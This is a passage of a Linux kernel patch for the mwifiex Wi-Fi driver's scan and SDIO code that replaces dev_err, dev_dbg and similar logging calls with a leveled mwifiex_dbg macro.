%d, returned %d APs...", + scan_resp_size, num_of_set); mwifiex_dbg_dump(adapter, CMD_D, "EXT_SCAN buffer:", buf, scan_resp_size + sizeof(struct mwifiex_event_scan_result)); @@ -2135,7 +2168,8 @@ int mwifiex_handle_event_ext_scan_report(struct mwifiex_private *priv, type = le16_to_cpu(tlv->header.type); len = le16_to_cpu(tlv->header.len); if (bytes_left < sizeof(struct mwifiex_ie_types_header) + len) { - dev_err(adapter->dev, "EXT_SCAN: Error bytes left < TLV length\n"); + mwifiex_dbg(adapter, ERROR, + "EXT_SCAN: Error bytes left < TLV length\n"); break; } scan_rsp_tlv = NULL; @@ -2161,8 +2195,9 @@ int mwifiex_handle_event_ext_scan_report(struct mwifiex_private *priv, len = le16_to_cpu(tlv->header.len); if (bytes_left_for_tlv < sizeof(struct mwifiex_ie_types_header) + len) { - dev_err(adapter->dev, - "EXT_SCAN: Error in processing TLV, bytes left < TLV length\n"); + mwifiex_dbg(adapter, ERROR, + "EXT_SCAN: Error in processing TLV,\t" + "bytes left < TLV length\n"); scan_rsp_tlv = NULL; bytes_left_for_tlv = 0; continue; @@ -2202,8 +2237,8 @@ int mwifiex_handle_event_ext_scan_report(struct mwifiex_private *priv, if (scan_info_tlv) { rssi = (s32)(s16)(le16_to_cpu(scan_info_tlv->rssi)); rssi *= 100; /* Convert dBm to mBm */ - dev_dbg(adapter->dev, - "info: InterpretIE: RSSI=%d\n", rssi); + mwifiex_dbg(adapter, INFO, + "info: InterpretIE: RSSI=%d\n", rssi); fw_tsf = le64_to_cpu(scan_info_tlv->tsf); radio_type = &scan_info_tlv->radio_type; } else { @@ -2274,13 +2309,14 @@ static int mwifiex_scan_specific_ssid(struct mwifiex_private *priv, struct mwifiex_user_scan_cfg *scan_cfg; if (adapter->scan_processing) { - dev_err(adapter->dev, "cmd: Scan already in process...\n"); + mwifiex_dbg(adapter, WARN, + "cmd: Scan already in process...\n"); return -EBUSY; } if (priv->scan_block) { - dev_err(adapter->dev, - "cmd: Scan is blocked during association...\n"); + mwifiex_dbg(adapter, WARN, + "cmd: Scan is blocked during association...\n"); return -EBUSY; } @@ -2312,8 +2348,9 @@ int mwifiex_request_scan(struct mwifiex_private *priv, int ret; if (down_interruptible(&priv->async_sem)) { - dev_err(priv->adapter->dev, "%s: acquire semaphore\n", - __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: acquire semaphore fail\n", + __func__); return -1; } @@ -2403,8 +2440,9 @@ mwifiex_save_curr_bcn(struct mwifiex_private *priv) memcpy(priv->curr_bcn_buf, curr_bss->beacon_buf, curr_bss->beacon_buf_size); - dev_dbg(priv->adapter->dev, "info: current beacon saved %d\n", - priv->curr_bcn_size); + mwifiex_dbg(priv->adapter, INFO, + "info: current beacon saved %d\n", + priv->curr_bcn_size); curr_bss->beacon_buf = priv->curr_bcn_buf; diff --git a/drivers/net/wireless/mwifiex/sdio.c b/drivers/net/wireless/mwifiex/sdio.c index d10320f89bc1..f4b1de7977ab 100644 --- a/drivers/net/wireless/mwifiex/sdio.c +++ b/drivers/net/wireless/mwifiex/sdio.c @@ -166,7 +166,8 @@ static int mwifiex_sdio_resume(struct device *dev) adapter = card->adapter; if (!adapter->is_suspended) { - dev_warn(adapter->dev, "device already resumed\n"); + mwifiex_dbg(adapter, WARN, + "device already resumed\n"); return 0; } @@ -191,8 +192,6 @@ mwifiex_sdio_remove(struct sdio_func *func) struct mwifiex_adapter *adapter; struct mwifiex_private *priv; - pr_debug("info: SDIO func num=%d\n", func->num); - card = sdio_get_drvdata(func); if (!card) return; @@ -201,6 +200,8 @@ mwifiex_sdio_remove(struct sdio_func *func) if (!adapter || !adapter->priv_num) return; + mwifiex_dbg(adapter, INFO, "info: SDIO func num=%d\n", func->num); + if (user_rmmod) { if (adapter->is_suspended) mwifiex_sdio_resume(adapter->dev); @@ -257,12 +258,14 @@ static int mwifiex_sdio_suspend(struct device *dev) /* Enable the Host Sleep */ if (!mwifiex_enable_hs(adapter)) { - dev_err(adapter->dev, "cmd: failed to suspend\n"); + mwifiex_dbg(adapter, ERROR, + "cmd: failed to suspend\n"); adapter->hs_enabling = false; return -EFAULT; } - dev_dbg(adapter->dev, "cmd: suspend with MMC_PM_KEEP_POWER\n"); + mwifiex_dbg(adapter, INFO, + "cmd: suspend with MMC_PM_KEEP_POWER\n"); ret = sdio_set_host_pm_flags(func, MMC_PM_KEEP_POWER); /* Indicate device suspended */ @@ -386,8 +389,8 @@ mwifiex_write_data_sync(struct mwifiex_adapter *adapter, u32 ioport = (port & MWIFIEX_SDIO_IO_PORT_MASK); if (adapter->is_suspended) { - dev_err(adapter->dev, - "%s: not allowed while suspended\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: not allowed while suspended\n", __func__); return -1; } @@ -434,7 +437,8 @@ static int mwifiex_read_data_sync(struct mwifiex_adapter *adapter, u8 *buffer, */ static int mwifiex_pm_wakeup_card(struct mwifiex_adapter *adapter) { - dev_dbg(adapter->dev, "event: wakeup device...\n"); + mwifiex_dbg(adapter, EVENT, + "event: wakeup device...\n"); return mwifiex_write_reg(adapter, CONFIGURATION_REG, HOST_POWER_UP); } @@ -446,7 +450,8 @@ static int mwifiex_pm_wakeup_card(struct mwifiex_adapter *adapter) */ static int mwifiex_pm_wakeup_card_complete(struct mwifiex_adapter *adapter) { - dev_dbg(adapter->dev, "cmd: wakeup device completed\n"); + mwifiex_dbg(adapter, EVENT, + "cmd: wakeup device completed\n"); return mwifiex_write_reg(adapter, CONFIGURATION_REG, 0); } @@ -524,7 +529,8 @@ static int mwifiex_init_sdio_ioport(struct mwifiex_adapter *adapter) else return -1; cont: - pr_debug("info: SDIO FUNC1 IO port: %#x\n", adapter->ioport); + mwifiex_dbg(adapter, INFO, + "info: SDIO FUNC1 IO port: %#x\n", adapter->ioport); /* Set Host interrupt reset to read to clear */ if (!mwifiex_read_reg(adapter, card->reg->host_int_rsr_reg, ®)) @@ -556,10 +562,12 @@ static int mwifiex_write_data_to_card(struct mwifiex_adapter *adapter, ret = mwifiex_write_data_sync(adapter, payload, pkt_len, port); if (ret) { i++; - dev_err(adapter->dev, "host_to_card, write iomem" - " (%d) failed: %d\n", i, ret); + mwifiex_dbg(adapter, ERROR, + "host_to_card, write iomem\t" + "(%d) failed: %d\n", i, ret); if (mwifiex_write_reg(adapter, CONFIGURATION_REG, 0x04)) - dev_err(adapter->dev, "write CFG reg failed\n"); + mwifiex_dbg(adapter, ERROR, + "write CFG reg failed\n"); ret = -1; if (i > MAX_WRITE_IOMEM_RETRY) @@ -584,7 +592,8 @@ static int mwifiex_get_rd_port(struct mwifiex_adapter *adapter, u8 *port) const struct mwifiex_sdio_card_reg *reg = card->reg; u32 rd_bitmap = card->mp_rd_bitmap; - dev_dbg(adapter->dev, "data: mp_rd_bitmap=0x%08x\n", rd_bitmap); + mwifiex_dbg(adapter, DATA, + "data: mp_rd_bitmap=0x%08x\n", rd_bitmap); if (card->supports_sdio_new_mode) { if (!(rd_bitmap & reg->data_port_mask)) @@ -598,8 +607,9 @@ static int mwifiex_get_rd_port(struct mwifiex_adapter *adapter, u8 *port) (card->mp_rd_bitmap & CTRL_PORT_MASK)) { card->mp_rd_bitmap &= (u32) (~CTRL_PORT_MASK); *port = CTRL_PORT; - dev_dbg(adapter->dev, "data: port=%d mp_rd_bitmap=0x%08x\n", - *port, card->mp_rd_bitmap); + mwifiex_dbg(adapter, DATA, + "data: port=%d mp_rd_bitmap=0x%08x\n", + *port, card->mp_rd_bitmap); return 0; } @@ -613,9 +623,9 @@ static int mwifiex_get_rd_port(struct mwifiex_adapter *adapter, u8 *port) if (++card->curr_rd_port == card->max_ports) card->curr_rd_port = reg->start_rd_port; - dev_dbg(adapter->dev, - "data: port=%d mp_rd_bitmap=0x%08x -> 0x%08x\n", - *port, rd_bitmap, card->mp_rd_bitmap); + mwifiex_dbg(adapter, DATA, + "data: port=%d mp_rd_bitmap=0x%08x -> 0x%08x\n", + *port, rd_bitmap, card->mp_rd_bitmap); return 0; } @@ -633,7 +643,8 @@ static int mwifiex_get_wr_port_data(struct mwifiex_adapter *adapter, u32 *port) const struct mwifiex_sdio_card_reg *reg = card->reg; u32 wr_bitmap = card->mp_wr_bitmap; - dev_dbg(adapter->dev, "data: mp_wr_bitmap=0x%08x\n", wr_bitmap); + mwifiex_dbg(adapter, DATA, + "data: mp_wr_bitmap=0x%08x\n", wr_bitmap); if (!(wr_bitmap & card->mp_data_port_mask)) { adapter->data_sent = true; @@ -651,15 +662,16 @@ static int mwifiex_get_wr_port_data(struct mwifiex_adapter *adapter, u32 *port) } if ((card->has_control_mask) && (*port == CTRL_PORT)) { - dev_err(adapter->dev, - "invalid data port=%d cur port=%d mp_wr_bitmap=0x%08x -> 0x%08x\n", - *port, card->curr_wr_port, wr_bitmap, - card->mp_wr_bitmap); + mwifiex_dbg(adapter, ERROR, + "invalid data port=%d cur port=%d mp_wr_bitmap=0x%08x -> 0x%08x\n", + *port, card->curr_wr_port, wr_bitmap, + card->mp_wr_bitmap); return -1; } - dev_dbg(adapter->dev, "data: port=%d mp_wr_bitmap=0x%08x -> 0x%08x\n", - *port, wr_bitmap, card->mp_wr_bitmap); + mwifiex_dbg(adapter, DATA, + "data: port=%d mp_wr_bitmap=0x%08x -> 0x%08x\n", + *port, wr_bitmap, card->mp_wr_bitmap); return 0; } @@ -683,7 +695,8 @@ mwifiex_sdio_poll_card_status(struct mwifiex_adapter *adapter, u8 bits) usleep_range(10, 20); } - dev_err(adapter->dev, "poll card status failed, tries = %d\n", tries); + mwifiex_dbg(adapter, ERROR, + "poll card status failed, tries = %d\n", tries); return -1; } @@ -738,7 +751,7 @@ static void mwifiex_interrupt_status(struct mwifiex_adapter *adapter) if (mwifiex_read_data_sync(adapter, card->mp_regs, card->reg->max_mp_regs, REG_PORT | MWIFIEX_SDIO_BYTE_MODE_MASK, 0)) { - dev_err(adapter->dev, "read mp_regs failed\n"); + mwifiex_dbg(adapter, ERROR, "read mp_regs failed\n"); return; } @@ -751,7 +764,8 @@ static void mwifiex_interrupt_status(struct mwifiex_adapter *adapter) * UP_LD_CMD_PORT_HOST_INT_STATUS * Clear the interrupt status register */ - dev_dbg(adapter->dev, "int: sdio_ireg = %#x\n", sdio_ireg); + mwifiex_dbg(adapter, INTR, + "int: sdio_ireg = %#x\n", sdio_ireg); spin_lock_irqsave(&adapter->int_lock, flags); adapter->int_status |= sdio_ireg; spin_unlock_irqrestore(&adapter->int_lock, flags); @@ -802,7 +816,8 @@ static int mwifiex_sdio_enable_host_int(struct mwifiex_adapter *adapter) /* Request the SDIO IRQ */ ret = sdio_claim_irq(func, mwifiex_sdio_interrupt); if (ret) { - dev_err(adapter->dev, "claim irq failed: ret=%d\n", ret); + mwifiex_dbg(adapter, ERROR, + "claim irq failed: ret=%d\n", ret); goto out; } @@ -810,7 +825,8 @@ static int mwifiex_sdio_enable_host_int(struct mwifiex_adapter *adapter) ret = mwifiex_write_reg_locked(func, card->reg->host_int_mask_reg, card->reg->host_int_enable); if (ret) { - dev_err(adapter->dev, "enable host interrupt failed\n"); + mwifiex_dbg(adapter, ERROR, + "enable host interrupt failed\n"); sdio_release_irq(func); } @@ -830,22 +846,25 @@ static int mwifiex_sdio_card_to_host(struct mwifiex_adapter *adapter, u32 nb; if (!buffer) { - dev_err(adapter->dev, "%s: buffer is NULL\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: buffer is NULL\n", __func__); return -1; } ret = mwifiex_read_data_sync(adapter, buffer, npayload, ioport, 1); if (ret) { - dev_err(adapter->dev, "%s: read iomem failed: %d\n", __func__, + mwifiex_dbg(adapter, ERROR, + "%s: read iomem failed: %d\n", __func__, ret); return -1; } nb = le16_to_cpu(*(__le16 *) (buffer)); if (nb > npayload) { - dev_err(adapter->dev, "%s: invalid packet, nb=%d npayload=%d\n", - __func__, nb, npayload); + mwifiex_dbg(adapter, ERROR, + "%s: invalid packet, nb=%d npayload=%d\n", + __func__, nb, npayload); return -1; } @@ -877,13 +896,14 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, u32 i = 0; if (!firmware_len) { - dev_err(adapter->dev, - "firmware image not found! Terminating download\n"); + mwifiex_dbg(adapter, ERROR, + "firmware image not found! Terminating download\n"); return -1; } - dev_dbg(adapter->dev, "info: downloading FW image (%d bytes)\n", - firmware_len); + mwifiex_dbg(adapter, INFO, + "info: downloading FW image (%d bytes)\n", + firmware_len); /* Assume that the allocated buffer is 8-byte aligned */ fwbuf = kzalloc(MWIFIEX_UPLD_SIZE, GFP_KERNEL); @@ -897,8 +917,9 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, ret = mwifiex_sdio_poll_card_status(adapter, CARD_IO_READY | DN_LD_CARD_RDY); if (ret) { - dev_err(adapter->dev, "FW download with helper:" - " poll status timeout @ %d\n", offset); + mwifiex_dbg(adapter, ERROR, + "FW download with helper:\t" + "poll status timeout @ %d\n", offset); goto done; } @@ -910,19 +931,19 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, ret = mwifiex_read_reg(adapter, reg->base_0_reg, &base0); if (ret) { - dev_err(adapter->dev, - "dev BASE0 register read failed: " - "base0=%#04X(%d). Terminating dnld\n", - base0, base0); + mwifiex_dbg(adapter, ERROR, + "dev BASE0 register read failed:\t" + "base0=%#04X(%d). Terminating dnld\n", + base0, base0); goto done; } ret = mwifiex_read_reg(adapter, reg->base_1_reg, &base1); if (ret) { - dev_err(adapter->dev, - "dev BASE1 register read failed: " - "base1=%#04X(%d). Terminating dnld\n", - base1, base1); + mwifiex_dbg(adapter, ERROR, + "dev BASE1 register read failed:\t" + "base1=%#04X(%d). Terminating dnld\n", + base1, base1); goto done; } len = (u16) (((base1 & 0xff) << 8) | (base0 & 0xff)); @@ -936,9 +957,9 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, if (!len) { break; } else if (len > MWIFIEX_UPLD_SIZE) { - dev_err(adapter->dev, - "FW dnld failed @ %d, invalid length %d\n", - offset, len); + mwifiex_dbg(adapter, ERROR, + "FW dnld failed @ %d, invalid length %d\n", + offset, len); ret = -1; goto done; } @@ -948,14 +969,15 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, if (len & BIT(0)) { i++; if (i > MAX_WRITE_IOMEM_RETRY) { - dev_err(adapter->dev, - "FW dnld failed @ %d, over max retry\n", - offset); + mwifiex_dbg(adapter, ERROR, + "FW dnld failed @ %d, over max retry\n", + offset); ret = -1; goto done; } - dev_err(adapter->dev, "CRC indicated by the helper:" - " len = 0x%04X, txlen = %d\n", len, txlen); + mwifiex_dbg(adapter, ERROR, + "CRC indicated by the helper:\t" + "len = 0x%04X, txlen = %d\n", len, txlen); len &= ~BIT(0); /* Setting this to 0 to resend from same offset */ txlen = 0; @@ -978,11 +1000,12 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, MWIFIEX_SDIO_BLOCK_SIZE, adapter->ioport); if (ret) { - dev_err(adapter->dev, - "FW download, write iomem (%d) failed @ %d\n", - i, offset); + mwifiex_dbg(adapter, ERROR, + "FW download, write iomem (%d) failed @ %d\n", + i, offset); if (mwifiex_write_reg(adapter, CONFIGURATION_REG, 0x04)) - dev_err(adapter->dev, "write CFG reg failed\n"); + mwifiex_dbg(adapter, ERROR, + "write CFG reg failed\n"); ret = -1; goto done; @@ -991,8 +1014,8 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, offset += txlen; } while (true); - dev_notice(adapter->dev, - "info: FW download over, size %d bytes\n", offset); + mwifiex_dbg(adapter, MSG, + "info: FW download over, size %d bytes\n", offset); ret = 0; done: @@ -1066,18 +1089,20 @@ static void mwifiex_deaggr_sdio_pkt(struct mwifiex_adapter *adapter, blk_num = *(data + BLOCK_NUMBER_OFFSET); blk_size = adapter->sdio_rx_block_size * blk_num; if (blk_size > total_pkt_len) { - dev_err(adapter->dev, "%s: error in pkt,\t" - "blk_num=%d, blk_size=%d, total_pkt_len=%d\n", - __func__, blk_num, blk_size, total_pkt_len); + mwifiex_dbg(adapter, ERROR, + "%s: error in blk_size,\t" + "blk_num=%d, blk_size=%d, total_pkt_len=%d\n", + __func__, blk_num, blk_size, total_pkt_len); break; } pkt_len = le16_to_cpu(*(__le16 *)(data + SDIO_HEADER_OFFSET)); pkt_type = le16_to_cpu(*(__le16 *)(data + SDIO_HEADER_OFFSET + 2)); if ((pkt_len + SDIO_HEADER_OFFSET) > blk_size) { - dev_err(adapter->dev, "%s: error in pkt,\t" - "pkt_len=%d, blk_size=%d\n", - __func__, pkt_len, blk_size); + mwifiex_dbg(adapter, ERROR, + "%s: error in pkt_len,\t" + "pkt_len=%d, blk_size=%d\n", + __func__, pkt_len, blk_size); break; } skb_deaggr = mwifiex_alloc_dma_align_buf(pkt_len, @@ -1116,7 +1141,8 @@ static int mwifiex_decode_rx_packet(struct mwifiex_adapter *adapter, switch (upld_typ) { case MWIFIEX_TYPE_AGGR_DATA: - dev_dbg(adapter->dev, "info: --- Rx: Aggr Data packet ---\n"); + mwifiex_dbg(adapter, INFO, + "info: --- Rx: Aggr Data packet ---\n"); rx_info = MWIFIEX_SKB_RXCB(skb); rx_info->buf_type = MWIFIEX_TYPE_AGGR_DATA; if (adapter->rx_work_enabled) { @@ -1130,7 +1156,8 @@ static int mwifiex_decode_rx_packet(struct mwifiex_adapter *adapter, break; case MWIFIEX_TYPE_DATA: - dev_dbg(adapter->dev, "info: --- Rx: Data packet ---\n"); + mwifiex_dbg(adapter, DATA, + "info: --- Rx: Data packet ---\n"); if (adapter->rx_work_enabled) { skb_queue_tail(&adapter->rx_data_q, skb); adapter->data_received = true; @@ -1141,7 +1168,8 @@ static int mwifiex_decode_rx_packet(struct mwifiex_adapter *adapter, break; case MWIFIEX_TYPE_CMD: - dev_dbg(adapter->dev, "info: --- Rx: Cmd Response ---\n"); + mwifiex_dbg(adapter, CMD, + "info: --- Rx: Cmd Response ---\n"); /* take care of curr_cmd = NULL case */ if (!adapter->curr_cmd) { cmd_buf = adapter->upld_buf; @@ -1163,7 +1191,8 @@ static int mwifiex_decode_rx_packet(struct mwifiex_adapter *adapter, break; case MWIFIEX_TYPE_EVENT: - dev_dbg(adapter->dev, "info: --- Rx: Event ---\n"); + mwifiex_dbg(adapter, EVENT, + "info: --- Rx: Event ---\n"); adapter->event_cause = le32_to_cpu(*(__le32 *) skb->data); if ((skb->len > 0) && (skb->len < MAX_EVENT_SIZE)) @@ -1178,7 +1207,8 @@ static int mwifiex_decode_rx_packet(struct mwifiex_adapter *adapter, break; default: - dev_err(adapter->dev, "unknown upload type %#x\n", upld_typ); + mwifiex_dbg(adapter, ERROR, + "unknown upload type %#x\n", upld_typ); dev_kfree_skb_any(skb); break; } @@ -1210,16 +1240,18 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, if ((card->has_control_mask) && (port == CTRL_PORT)) { /* Read the command Resp without aggr */ - dev_dbg(adapter->dev, "info: %s: no aggregation for cmd " - "response\n", __func__); + mwifiex_dbg(adapter, CMD, + "info: %s: no aggregation for cmd\t" + "response\n", __func__); f_do_rx_cur = 1; goto rx_curr_single; } if (!card->mpa_rx.enabled) { - dev_dbg(adapter->dev, "info: %s: rx aggregation disabled\n", - __func__); + mwifiex_dbg(adapter, WARN, + "info: %s: rx aggregation disabled\n", + __func__); f_do_rx_cur = 1; goto rx_curr_single; @@ -1230,7 +1262,8 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, (card->has_control_mask && (card->mp_rd_bitmap & (~((u32) CTRL_PORT_MASK))))) { /* Some more data RX pending */ - dev_dbg(adapter->dev, "info: %s: not last packet\n", __func__); + mwifiex_dbg(adapter, INFO, + "info: %s: not last packet\n", __func__); if (MP_RX_AGGR_IN_PROGRESS(card)) { if (MP_RX_AGGR_BUF_HAS_ROOM(card, rx_len)) { @@ -1247,7 +1280,8 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, } else { /* No more data RX pending */ - dev_dbg(adapter->dev, "info: %s: last packet\n", __func__); + mwifiex_dbg(adapter, INFO, + "info: %s: last packet\n", __func__); if (MP_RX_AGGR_IN_PROGRESS(card)) { f_do_rx_aggr = 1; @@ -1262,14 +1296,16 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, } if (f_aggr_cur) { - dev_dbg(adapter->dev, "info: current packet aggregation\n"); + mwifiex_dbg(adapter, INFO, + "info: current packet aggregation\n"); /* Curr pkt can be aggregated */ mp_rx_aggr_setup(card, rx_len, port); if (MP_RX_AGGR_PKT_LIMIT_REACHED(card) || mp_rx_aggr_port_limit_reached(card)) { - dev_dbg(adapter->dev, "info: %s: aggregated packet " - "limit reached\n", __func__); + mwifiex_dbg(adapter, INFO, + "info: %s: aggregated packet\t" + "limit reached\n", __func__); /* No more pkts allowed in Aggr buf, rx it */ f_do_rx_aggr = 1; } @@ -1277,8 +1313,9 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, if (f_do_rx_aggr) { /* do aggr RX now */ - dev_dbg(adapter->dev, "info: do_rx_aggr: num of packets: %d\n", - card->mpa_rx.pkt_cnt); + mwifiex_dbg(adapter, DATA, + "info: do_rx_aggr: num of packets: %d\n", + card->mpa_rx.pkt_cnt); if (card->supports_sdio_new_mode) { int i; @@ -1318,8 +1355,9 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, GFP_KERNEL | GFP_DMA); if (!skb_deaggr) { - dev_err(adapter->dev, "skb allocation failure drop pkt len=%d type=%d\n", - pkt_len, pkt_type); + mwifiex_dbg(adapter, ERROR, "skb allocation failure\t" + "drop pkt len=%d type=%d\n", + pkt_len, pkt_type); curr_ptr += len_arr[pind]; continue; } @@ -1339,12 +1377,12 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, mwifiex_decode_rx_packet(adapter, skb_deaggr, pkt_type); } else { - dev_err(adapter->dev, " drop wrong aggr pkt:\t" - "sdio_single_port_rx_aggr=%d\t" - "type=%d len=%d max_len=%d\n", - adapter->sdio_rx_aggr_enable, - pkt_type, pkt_len, - len_arr[pind]); + mwifiex_dbg(adapter, ERROR, + "drop wrong aggr pkt:\t" + "sdio_single_port_rx_aggr=%d\t" + "type=%d len=%d max_len=%d\n", + adapter->sdio_rx_aggr_enable, + pkt_type, pkt_len, len_arr[pind]); dev_kfree_skb_any(skb_deaggr); } curr_ptr += len_arr[pind]; @@ -1354,13 +1392,14 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, rx_curr_single: if (f_do_rx_cur) { - dev_dbg(adapter->dev, "info: RX: port: %d, rx_len: %d\n", - port, rx_len); + mwifiex_dbg(adapter, INFO, "info: RX: port: %d, rx_len: %d\n", + port, rx_len); skb = mwifiex_alloc_dma_align_buf(rx_len, GFP_KERNEL | GFP_DMA); if (!skb) { - dev_err(adapter->dev, "single skb allocated fail,\t" - "drop pkt port=%d len=%d\n", port, rx_len); + mwifiex_dbg(adapter, ERROR, + "single skb allocated fail,\t" + "drop pkt port=%d len=%d\n", port, rx_len); if (mwifiex_sdio_card_to_host(adapter, &pkt_type, card->mpa_rx.buf, rx_len, adapter->ioport + port)) @@ -1376,9 +1415,9 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, goto error; if (!adapter->sdio_rx_aggr_enable && pkt_type == MWIFIEX_TYPE_AGGR_DATA) { - dev_err(adapter->dev, "drop wrong pkt type %d\t" - "current SDIO RX Aggr not enabled\n", - pkt_type); + mwifiex_dbg(adapter, ERROR, "drop wrong pkt type %d\t" + "current SDIO RX Aggr not enabled\n", + pkt_type); dev_kfree_skb_any(skb); return 0; } @@ -1386,7 +1425,8 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, mwifiex_decode_rx_packet(adapter, skb, pkt_type); } if (f_post_aggr_cur) { - dev_dbg(adapter->dev, "info: current packet aggregation\n"); + mwifiex_dbg(adapter, INFO, + "info: current packet aggregation\n"); /* Curr pkt can be aggregated */ mp_rx_aggr_setup(card, rx_len, port); } @@ -1458,7 +1498,7 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) MWIFIEX_RX_DATA_BUF_SIZE) return -1; rx_len = (u16) (rx_blocks * MWIFIEX_SDIO_BLOCK_SIZE); - dev_dbg(adapter->dev, "info: rx_len = %d\n", rx_len); + mwifiex_dbg(adapter, INFO, "info: rx_len = %d\n", rx_len); skb = mwifiex_alloc_dma_align_buf(rx_len, GFP_KERNEL | GFP_DMA); if (!skb) @@ -1469,17 +1509,17 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) if (mwifiex_sdio_card_to_host(adapter, &pkt_type, skb->data, skb->len, adapter->ioport | CMD_PORT_SLCT)) { - dev_err(adapter->dev, - "%s: failed to card_to_host", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to card_to_host", __func__); dev_kfree_skb_any(skb); goto term_cmd; } if ((pkt_type != MWIFIEX_TYPE_CMD) && (pkt_type != MWIFIEX_TYPE_EVENT)) - dev_err(adapter->dev, - "%s:Received wrong packet on cmd port", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s:Received wrong packet on cmd port", + __func__); mwifiex_decode_rx_packet(adapter, skb, pkt_type); } @@ -1495,12 +1535,13 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) } card->mp_wr_bitmap = bitmap; - dev_dbg(adapter->dev, "int: DNLD: wr_bitmap=0x%x\n", - card->mp_wr_bitmap); + mwifiex_dbg(adapter, INTR, + "int: DNLD: wr_bitmap=0x%x\n", + card->mp_wr_bitmap); if (adapter->data_sent && (card->mp_wr_bitmap & card->mp_data_port_mask)) { - dev_dbg(adapter->dev, - "info: <--- Tx DONE Interrupt --->\n"); + mwifiex_dbg(adapter, INTR, + "info: <--- Tx DONE Interrupt --->\n"); adapter->data_sent = false; } } @@ -1517,8 +1558,8 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) adapter->cmd_sent = false; } - dev_dbg(adapter->dev, "info: cmd_sent=%d data_sent=%d\n", - adapter->cmd_sent, adapter->data_sent); + mwifiex_dbg(adapter, INTR, "info: cmd_sent=%d data_sent=%d\n", + adapter->cmd_sent, adapter->data_sent); if (sdio_ireg & UP_LD_HOST_INT_STATUS) { bitmap = (u32) card->mp_regs[reg->rd_bitmap_l]; bitmap |= ((u32) card->mp_regs[reg->rd_bitmap_u]) << 8; @@ -1529,40 +1570,45 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) ((u32) card->mp_regs[reg->rd_bitmap_1u]) << 24; } card->mp_rd_bitmap = bitmap; - dev_dbg(adapter->dev, "int: UPLD: rd_bitmap=0x%x\n", - card->mp_rd_bitmap); + mwifiex_dbg(adapter, INTR, + "int: UPLD: rd_bitmap=0x%x\n", + card->mp_rd_bitmap); while (true) { ret = mwifiex_get_rd_port(adapter, &port); if (ret) { - dev_dbg(adapter->dev, - "info: no more rd_port available\n"); + mwifiex_dbg(adapter, INFO, + "info: no more rd_port available\n"); break; } len_reg_l = reg->rd_len_p0_l + (port << 1); len_reg_u = reg->rd_len_p0_u + (port << 1); rx_len = ((u16) card->mp_regs[len_reg_u]) << 8; rx_len |= (u16) card->mp_regs[len_reg_l]; - dev_dbg(adapter->dev, "info: RX: port=%d rx_len=%u\n", - port, rx_len); + mwifiex_dbg(adapter, INFO, + "info: RX: port=%d rx_len=%u\n", + port, rx_len); rx_blocks = (rx_len + MWIFIEX_SDIO_BLOCK_SIZE - 1) / MWIFIEX_SDIO_BLOCK_SIZE; if (rx_len <= INTF_HEADER_LEN || (rx_blocks * MWIFIEX_SDIO_BLOCK_SIZE) > card->mpa_rx.buf_size) { - dev_err(adapter->dev, "invalid rx_len=%d\n", - rx_len); + mwifiex_dbg(adapter, ERROR, + "invalid rx_len=%d\n", + rx_len); return -1; } rx_len = (u16) (rx_blocks * MWIFIEX_SDIO_BLOCK_SIZE); - dev_dbg(adapter->dev, "info: rx_len = %d\n", rx_len); + mwifiex_dbg(adapter, INFO, "info: rx_len = %d\n", + rx_len); if (mwifiex_sdio_card_to_host_mp_aggr(adapter, rx_len, port)) { - dev_err(adapter->dev, "card_to_host_mpa failed:" - " int status=%#x\n", sdio_ireg); + mwifiex_dbg(adapter, ERROR, + "card_to_host_mpa failed: int status=%#x\n", + sdio_ireg); goto term_cmd; } } @@ -1573,19 +1619,23 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) term_cmd: /* terminate cmd */ if (mwifiex_read_reg(adapter, CONFIGURATION_REG, &cr)) - dev_err(adapter->dev, "read CFG reg failed\n"); + mwifiex_dbg(adapter, ERROR, "read CFG reg failed\n"); else - dev_dbg(adapter->dev, "info: CFG reg val = %d\n", cr); + mwifiex_dbg(adapter, INFO, + "info: CFG reg val = %d\n", cr); if (mwifiex_write_reg(adapter, CONFIGURATION_REG, (cr | 0x04))) - dev_err(adapter->dev, "write CFG reg failed\n"); + mwifiex_dbg(adapter, ERROR, + "write CFG reg failed\n"); else - dev_dbg(adapter->dev, "info: write success\n"); + mwifiex_dbg(adapter, INFO, "info: write success\n"); if (mwifiex_read_reg(adapter, CONFIGURATION_REG, &cr)) - dev_err(adapter->dev, "read CFG reg failed\n"); + mwifiex_dbg(adapter, ERROR, + "read CFG reg failed\n"); else - dev_dbg(adapter->dev, "info: CFG reg val =%x\n", cr); + mwifiex_dbg(adapter, INFO, + "info: CFG reg val =%x\n", cr); return -1; } @@ -1619,8 +1669,9 @@ static int 